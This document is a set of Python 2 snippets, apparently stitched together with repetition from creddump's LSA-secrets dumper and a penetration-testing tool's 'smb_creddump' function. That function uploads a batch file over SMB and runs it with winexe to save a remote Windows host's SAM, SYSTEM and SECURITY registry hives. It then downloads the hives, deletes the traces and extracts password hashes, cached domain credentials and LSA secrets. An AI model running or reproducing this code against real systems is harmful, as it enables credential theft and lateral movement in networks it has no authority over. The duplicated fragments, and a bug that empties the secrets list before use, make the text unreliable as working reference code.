print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[ 0] def dump(src, length=8): N = 0 result = '' while src: s, src = src[:length], src[length:] hexa = ' '.join(["%02X" % ord(x) for x in s]) s = s.translate(FILTER) result += "%04X %-*s %s\n" % (N, length * 3, hexa, s) N += length return result if len(sys.argv) < 4 or sys.argv[3] not in ["true", "false"]: showUsage() sys.exit(1) else: vista = True if sys.argv[3] == "true" else False secrets = get_file_secrets(sys.argv[1], sys.argv[2]) if not secrets: print "Unable to read LSA secrets. Perhaps you provided invalid hive files?" sys.exit(1) for k in secrets: print k print dump(secrets[k], length=16)
print "\nExample (Windows Vista/7):" print "%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0] print "\nExample (Windows XP):" print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0] def dump(src, length=8): N=0; result='' while src: s,src = src[:length],src[length:] hexa = ' '.join(["%02X"%ord(x) for x in s]) s = s.translate(FILTER) result += "%04X %-*s %s\n" % (N, length*3, hexa, s) N+=length return result if len(sys.argv) < 4 or sys.argv[3] not in ["true", "false"]: showUsage() sys.exit(1) else: vista = True if sys.argv[3] == "true" else False secrets = get_file_secrets(sys.argv[1], sys.argv[2]) if not secrets: print "Unable to read LSA secrets. Perhaps you provided invalid hive files?" sys.exit(1) for k in secrets: print k print dump(secrets[k], length=16)
def smb_creddump(): """ [-s] <ip> [ user ] [ passwd/nthash ] Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets """ try: sys.path.insert(0, BASEDIR + '/creddump') from framework.win32 import hashdump, domcachedump, lsasecrets except: text("[!] Error: Creddump dependency missing.", 1) set_creds(3) text("[*] Extracting hives...") tmpfile = '/tmp/cred_run.bat' bat = ['@echo off', 'cd \\windows\\temp', 'reg save HKLM\\SAM sam.hive /y', 'reg save HKLM\\SYSTEM system.hive /y', 'reg save HKLM\\SECURITY security.hive /y'] open(tmpfile, 'w').write('\r\n'.join(bat)) smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile) print winexe('\\windows\\temp\\cred_run.bat') text("[*] Downloading hives...") smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip']) smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' % CONF['smb_ip']) smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' % CONF['smb_ip']) text("[*] Removing temp files...") smbclient('del "\\windows\\temp\\cred_run.bat"') smbclient('del "\\windows\\temp\\sam.hive"') smbclient('del "\\windows\\temp\\system.hive"') smbclient('del "\\windows\\temp\\security.hive"') os.unlink(tmpfile) text("[*] Extracting SAM credentials...") hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_sam.hive') text("[*] Extracting MSCASH credentials...") domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive') # Code below ripped from creddump's lsadump.py text("[*] Extracting LSA Secrets...") try: FILTER = ''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) secrets = lsasecrets.get_file_secrets(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive') if not secrets: text("[!] Unable to read LSA secrets.") else: for k in secrets: N = 0 length = 16 result = '' while secrets[k]: s, secrets[k] = secrets[k][:length],secrets[k][length:] hexa = ' '.join(["%02X" % ord(x) for x in s]) s = s.translate(FILTER) result += "%04X %-*s %s\n" % (N, length*3, hexa, s) N += length print k print result except: pass text("[*] SYSTEM, SAM and SECURITY hives were saved in the current directory.")
from framework.win32.lsasecrets import get_file_secrets # Hex dump code from # http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812 FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) def dump(src, length=8): N=0; result='' while src: s,src = src[:length],src[length:] hexa = ' '.join(["%02X"%ord(x) for x in s]) s = s.translate(FILTER) result += "%04X %-*s %s\n" % (N, length*3, hexa, s) N+=length return result if len(sys.argv) < 3: print "usage: %s Bootkey <security hive>" % sys.argv[0] sys.exit(1) secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2]) if not secrets: print "Unable to read LSA secrets. Perhaps you provided invalid hive files?" sys.exit(1) for k in secrets: print k print dump(secrets[k], length=16)
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812 FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)]) def dump(src, length=8): N = 0 result = '' while src: s, src = src[:length], src[length:] hexa = ' '.join(["%02X" % ord(x) for x in s]) s = s.translate(FILTER) result += "%04X %-*s %s\n" % (N, length * 3, hexa, s) N += length return result if len(sys.argv) < 3: print "usage: %s Bootkey <security hive>" % sys.argv[0] sys.exit(1) secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2]) if not secrets: print "Unable to read LSA secrets. Perhaps you provided invalid hive files?" sys.exit(1) for k in secrets: print k print dump(secrets[k], length=16)
def smb_creddump(): """ [-s] <ip/file/range> [ user ] [ passwd/nthash ] Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets """ try: sys.path.insert(0, BASEDIR + '/creddump') from framework.win32 import hashdump, domcachedump, lsasecrets except: text("[!] Error: Creddump dependency missing.", 1) set_creds(3) text("[*] %s Extracting hives..." % (CONF["smb_ip"])) tmpfile = '/tmp/cred_run.%s.bat' % (CONF["smb_ip"]) bat = [ '@echo off', 'cd \\windows\\temp', 'reg save HKLM\\SAM sam.hive /y', 'reg save HKLM\\SYSTEM system.hive /y', 'reg save HKLM\\SECURITY security.hive /y' ] open(tmpfile, 'w').write('\r\n'.join(bat)) smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile) text("[*] %s Running cred_run.bat\n%s\n" % (CONF["smb_ip"], winexe('\\windows\\temp\\cred_run.bat'))) text("[*] %s Downloading hives..." % (CONF["smb_ip"])) smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip']) smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' % CONF['smb_ip']) smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' % CONF['smb_ip']) text("[*] %s Removing temp files..." % (CONF["smb_ip"])) smbclient('del "\\windows\\temp\\cred_run.bat"') smbclient('del "\\windows\\temp\\sam.hive"') smbclient('del "\\windows\\temp\\system.hive"') smbclient('del "\\windows\\temp\\security.hive"') os.unlink(tmpfile) text("[*] %s Extracting SAM credentials..." % (CONF["smb_ip"])) hashes = hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_sam.hive') text("[*] %s Extracting MSCASH credentials..." % (CONF["smb_ip"])) mscash = domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive') text("[*] %s SAM hashes\n%s" % (CONF["smb_ip"], "\n".join(hashes))) text("[*] %s MsCash\n%s" % (CONF["smb_ip"], "\n".join(mscash))) # Code below ripped from creddump's lsadump.py text("[*] %s Extracting LSA Secrets..." % (CONF["smb_ip"])) try: FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)]) secrets = lsasecrets.get_file_secrets( CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive') if not secrets: text("[!] %s Error(smb_creddump): Unable to read LSA secrets." % (CONF["smb_ip"])) else: secrets = [] for k in secrets: N = 0 length = 16 result = '' while secrets[k]: s, secrets[k] = secrets[k][:length], secrets[k][length:] hexa = ' '.join(["%02X" % ord(x) for x in s]) s = s.translate(FILTER) result += "%04X %-*s %s\n" % (N, length * 3, hexa, s) N += length secrets.append(k) secrets.append(result) text("[*] %s LSA Secrets\n%s" % (CONF["smb_ip"], "\n".join(secrets))) except: pass text( "[*] %s SYSTEM, SAM and SECURITY hives were saved in the current directory." % (CONF["smb_ip"]))